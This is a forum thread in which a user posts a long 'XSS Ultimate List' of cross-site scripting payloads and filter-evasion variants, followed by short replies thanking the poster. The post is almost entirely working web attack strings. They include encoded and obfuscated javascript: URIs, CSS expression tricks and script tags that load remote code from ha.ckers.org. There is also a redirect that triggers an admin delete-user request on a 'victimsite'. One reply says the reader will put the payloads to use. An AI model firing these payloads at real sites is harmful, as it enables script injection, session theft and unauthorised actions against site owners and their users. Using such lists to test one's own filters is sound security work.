Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
XSS Ultimate List!
  • Xin
    Posts: 3,251
    All you ever need for testing if a site is vulnerable or not, every XSS technique you ever need!

    <SCRIPT>alert(/XSS/.source)</SCRIPT>
    \\";alert('XSS');//
    </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
    <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
    <BODY BACKGROUND=\"javascript:alert('XSS')\">
    <BODY ONLOAD=alert('XSS')>
    <IMG DYNSRC=\"javascript:alert('XSS')\">
    <IMG LOWSRC=\"javascript:alert('XSS')\">
    <IMG LOWSRC=\"javascript:alert('XSS')\">
    <BGSOUND SRC=\"javascript:alert('XSS');\">
    <BR SIZE=\"&{alert('XSS')}\">
    <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
    <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
    <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
    <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
    <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
    <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
    <XSS STYLE=\"behavior: url(xss.htc);\">
    <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
    <IMG SRC='vbscript:msgbox(\"XSS\")'>
    <IMG SRC=\"mocha:[code]\">
    <IMG SRC=\"livescript:[code]\">
    žscriptualert(EXSSE)ž/scriptu
    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
    <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
    <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
    <TABLE BACKGROUND=\"javascript:alert('XSS')\">
    <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
    <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
    <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
    <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
    <DIV STYLE=\"width: expression(alert('XSS'));\">
    <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
    <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
    <XSS STYLE=\"xss:expression(alert('XSS'))\">
    exp/*<A STYLE='no\xss:noxss(\"*//*\");
    xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
    <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
    <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
    <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
    <!--[if gte IE 4]>
    <SCRIPT>alert('XSS');</SCRIPT>
    <![endif]-->
    <BASE HREF=\"javascript:alert('XSS');//\">
    <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
    <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
    <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
    a=\"get\";
    b=\"URL(\\"\";
    c=\"javascript:\";
    d=\"alert('XSS');\\")\";
    eval(a+b+c+d);
    <HTML xmlns:xss>
    <?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\">
    <xss:xss>XSS</xss:xss>
    </HTML>
    <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
    </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
    <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
    <XML SRC=\"xsstest.xml\" ID=I></XML>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    <HTML><BODY>
    <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
    <?import namespace=\"t\" implementation=\"#default#time2\">
    <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
    </BODY></HTML>
    <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
    <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
    <? echo('<SCR)';
    echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
    <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
    Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
    <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
    <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
    <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <A HREF=\"http://66.102.7.147/\">XSS</A>
    <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
    <A HREF=\"http://1113982867/\">XSS</A>
    <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
    <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
    <A HREF=\"h
    tt p://6 6.000146.0x7.147/\">XSS</A>
    <A HREF=\"//www.google.com/\">XSS</A>
    <A HREF=\"//google\">XSS</A>
    <A HREF=\"http://ha.ckers.org@google\">XSS</A>
    <A HREF=\"http://google:ha.ckers.org\">XSS</A>
    <A HREF=\"http://google.com/\">XSS</A>
    <A HREF=\"http://www.google.com./\">XSS</A>
    <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
    <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
    <
    %3C
    &lt
    <
    &LT
    <
    &#60
    &#060
    &#0060
    &#00060
    &#000060
    &#0000060
    <
    <
    <
    <
    <
    <
    &#x3c
    &#x03c
    &#x003c
    &#x0003c
    &#x00003c
    &#x000003c
    <
    <
    <
    <
    <
    <
    &#X3c
    &#X03c
    &#X003c
    &#X0003c
    &#X00003c
    &#X000003c
    <
    <
    <
    <
    <
    <
    &#x3C
    &#x03C
    &#x003C
    &#x0003C
    &#x00003C
    &#x000003C
    <
    <
    <
    <
    <
    <
    &#X3C
    &#X03C
    &#X003C
    &#X0003C
    &#X00003C
    &#X000003C
    <
    <
    <
    <
    <
    <
    \x3c
    \x3C
    \u003c
    \u003C
    <iframe src=http://ha.ckers.org/scriptlet.html>
    <IMG SRC=\"javascript:alert('XSS')\"
    <SCRIPT SRC=//ha.ckers.org/.js>
    <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
    <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
    <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
    <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
    <IMG SRC=\" javascript:alert('XSS');\">
    perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
    perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
    <IMG
    SRC
    =
    \"
    j
    a
    v
    a
    s
    c
    r
    i
    p
    t
    :
    a
    l
    e
    r
    t
    (
    '
    X
    S
    S
    '
    )
    \"
    >
    <IMG SRC=\"jav
ascript:alert('XSS');\">
    <IMG SRC=\"jav
ascript:alert('XSS');\">
    <IMG SRC=\"jav	ascript:alert('XSS');\">
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
    <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
    <IMG SRC=javascript:alert("XSS")>
    <IMG SRC=JaVaScRiPt:alert('XSS')>
    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=\"javascript:alert('XSS');\">
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    '';!--\"<XSS>=&{()}
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    Xin
  • Thanks for these pal im sure i will put them to use!
  • Xin
    Posts: 3,251
    Glad you liked them, it took me quite a while to put together
    Xin
  • Bursihido
    Posts: 406
    i hope this good list :)........................
  • no17
    Posts: 54
    hope this good list
  • undead
    Posts: 822
    thanks in advance
  • vegito2010
    Posts: 17
    Sorry for bump.
    wanna see this thanks
  • how use its brooo..
  • undead
    Posts: 822
    said:


    how use its brooo..



    learn cross site scripting
  • Great list if my Vun scanner isn't working xD
  • Nice Share Man :)
  • Xin
    Posts: 3,251
    Glad you liked it :)
    Xin